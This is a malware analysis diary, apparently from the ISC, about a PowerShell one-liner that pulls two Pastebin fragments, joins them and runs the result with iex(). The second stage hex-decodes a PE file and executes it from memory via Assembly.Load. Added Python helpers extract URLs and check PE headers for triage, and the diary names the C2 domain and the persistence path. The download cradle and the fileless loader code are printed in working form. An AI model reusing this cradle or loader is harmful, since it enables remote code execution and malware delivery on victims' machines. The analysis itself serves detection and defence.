In politics, there is a strategy called "divide and conquer". It also applies to some pieces of malware that spread their malicious code across multiple sources. One of our readers shared a sample of PowerShell code found on Pastebin that applies exactly this technique. Thanks to him! Here is the complete PowerShell command line (beautified for easier reading):

powershell.exe -command
$request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF');
$request.Method="Get";
$response = $request.GetResponse();
$requestStream = $response.GetResponseStream();
$readStream = New-Object System.IO.StreamReader $requestStream;
$data=$readStream.ReadToEnd();
$rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA');
$rrequest.Method="Get";
$rresponse = $rrequest.GetResponse();
$rrequestStream = $rresponse.GetResponseStream();
$rreadStream = New-Object System.IO.StreamReader $rrequestStream;
$ddata=$rreadStream.ReadToEnd();
iex($data+$ddata)

The code is pretty easy to understand: it grabs the content of two pasties from pastebin.com, concatenates them and executes the result through iex(), an alias for Invoke-Expression. So we can expect these pasties to contain more PowerShell code.
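As an added illustration (not code from the diary or from the reader who submitted the sample), here is a small Python triage helper that pulls the download URLs and the iex() operands out of a one-liner like the one above and flags the "fetch several pieces, concatenate, execute" pattern. The sample command line is reconstructed from the diary's text with its defanging kept; the regular expressions and the function names (refang, analyze, etc.) are my own choices, not a published detection rule.

```python
import re

# Constructed sample, modelled on the one-liner in the diary and defanged the
# same way the diary shows it (hxxps and [.]). It only has to drive the parser.
SAMPLE_CMD = (
    "powershell.exe -command "
    "$request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF'); "
    "$request.Method=\"Get\"; $response = $request.GetResponse(); "
    "$requestStream = $response.GetResponseStream(); "
    "$readStream = New-Object System.IO.StreamReader $requestStream; "
    "$data=$readStream.ReadToEnd(); "
    "$rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA'); "
    "$rrequest.Method=\"Get\"; $rresponse = $rrequest.GetResponse(); "
    "$rrequestStream = $rresponse.GetResponseStream(); "
    "$rreadStream = New-Object System.IO.StreamReader $rrequestStream; "
    "$ddata=$rreadStream.ReadToEnd(); "
    "iex($data+$ddata)"
)

# Live or defanged URL, stopping at quotes, brackets and whitespace.
URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s'\"()<>]+", re.IGNORECASE)
# "$var = $something.ReadToEnd()" -> var holds a downloaded body.
READ_RE = re.compile(r"\$(\w+)\s*=\s*\$\w+\.ReadToEnd\(\)", re.IGNORECASE)
# Argument expression handed to iex / Invoke-Expression.
IEX_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b\s*\(?\s*([^;)]+)", re.IGNORECASE)


def refang(url):
    """Turn hxxps://pastebin[.]com into https://pastebin.com for lookups and blocklists."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE).replace("[.]", ".")


def extract_urls(cmd):
    """All URLs referenced by the command line, refanged."""
    return [refang(u) for u in URL_RE.findall(cmd)]


def downloaded_vars(cmd):
    """Names of the variables that receive a web response body."""
    return [m.group(1).lower() for m in READ_RE.finditer(cmd)]


def iex_operands(cmd):
    """Variables passed to iex, split on string concatenation ('+')."""
    m = IEX_RE.search(cmd)
    if not m:
        return []
    return [p.strip().lstrip("$").lower() for p in m.group(1).split("+")]


def analyze(cmd):
    """Summarise the command line and flag the split-payload pattern:
    more than one downloaded fragment joined together and executed."""
    urls = extract_urls(cmd)
    fetched = downloaded_vars(cmd)
    executed = iex_operands(cmd)
    staged = len(executed) > 1 and all(v in fetched for v in executed)
    return {"urls": urls, "fetched": fetched, "executed": executed, "staged": staged}


if __name__ == "__main__":
    print(analyze(SAMPLE_CMD))
```

The refanged URLs are what you would feed to a proxy log search or a paste-site takedown request; the `staged` flag is only true when every iex() operand traces back to a ReadToEnd() call, which is exactly the shape of the sample above and avoids firing on an ordinary single-stage download cradle.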
Indeed, here is the content of the concatenated data:

function HexToBin([string]$s) {
    $return = @()
    for ($i = 0; $i -lt $s.Length; $i += 2) {
        $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
    }
    Write-Output $return
}
$Str = '[stuff deleted] 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009001000C000000D
03C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000';
$Str = $Str.replace("0","0");
[byte[]]$Data = HexToBin($str);
$asm = [System.Reflection.Assembly]::Load($Data);
$asm.EntryPoint.invoke($null,$null);
write-host "Can you help me";
[void][System.Console]::ReadKey($true);

This piece of code decodes the hex-encoded $Str variable into $Data using the HexToBin() function and executes it. You can see the beginning of the string, '0x4D 0x5A 0x90', which indicates that it's a PE file. The way it is executed is interesting.
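The following Python, added here and not part of the diary, mirrors HexToBin() and adds the two checks a responder wants before loading anything: is the decoded blob really a PE (MZ stub plus the PE\0\0 signature at the offset stored in e_lfanew), and what is its SHA256 for a hash lookup. The hex blob below is a constructed minimal header, not the sample's bytes; hex_to_bin(), looks_like_pe() and triage() are names chosen for this example.

```python
import hashlib
import struct


def hex_to_bin(s):
    """Python equivalent of the diary's HexToBin(): two hex digits per byte.
    Whitespace is dropped first (pasted blobs often wrap); odd-length or
    non-hex input raises ValueError instead of failing halfway through."""
    s = "".join(s.split())
    if len(s) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(s)


def looks_like_pe(data):
    """True if data starts with the MZ stub and carries a PE\\0\\0 signature
    at the offset stored in e_lfanew (DOS header offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(hex_str):
    """Decode a hex blob the way the loader would, then report what a
    responder needs before submitting it anywhere: size, PE check, SHA256."""
    data = hex_to_bin(hex_str)
    return {
        "size": len(data),
        "is_pe": looks_like_pe(data),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


# Constructed stand-in for the diary's $Str: a minimal DOS header whose
# e_lfanew points at 0x40, followed by the PE signature and padding.
# This is not the diary's sample and is not a runnable executable.
SAMPLE_HEADER = (
    b"MZ\x90\x00" + b"\x00" * (0x3C - 4)   # e_magic and unused DOS fields
    + struct.pack("<I", 0x40)               # e_lfanew -> 0x40
    + b"PE\x00\x00" + b"\x00" * 20          # PE signature and padding
)
SAMPLE_HEX = SAMPLE_HEADER.hex().upper()

if __name__ == "__main__":
    print(triage(SAMPLE_HEX))
```

Decoding on an analysis box and hashing the result is enough to check a sandbox or VT verdict without ever calling Assembly.Load; note that the script's `$Str.replace("0","0")` line is a no-op and can be ignored when reproducing the decode.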
It uses the System.Reflection.Assembly[1] class to load the code and execute it from memory (fileless PowerShell). The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday, but today it was uploaded from Denmark and has already reached a score of 24/63[2]. It adds persistence by creating a .lnk file in %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pointing to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) via HTTPS.

[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2

Xavier Mertens (@xme)
Xme (ISC Handler), Nov 22nd 2018

Nov 22nd 2018
And NOW I'm hungry, with all this talk of pasties!
https://en.wikipedia.org/wiki/Pasty
Anonymous

Nov 22nd 2018
X - very interesting article. But all that is just secondary to your use of the term "pasties". Translated from British, it's a pastry. BUT the most overwhelmingly common :'-) use is <rotfl> "nipple covers" 8-D. <lmao>. I suppose that you saw a huge spike in hits that day.
Brett

Nov 28th 2018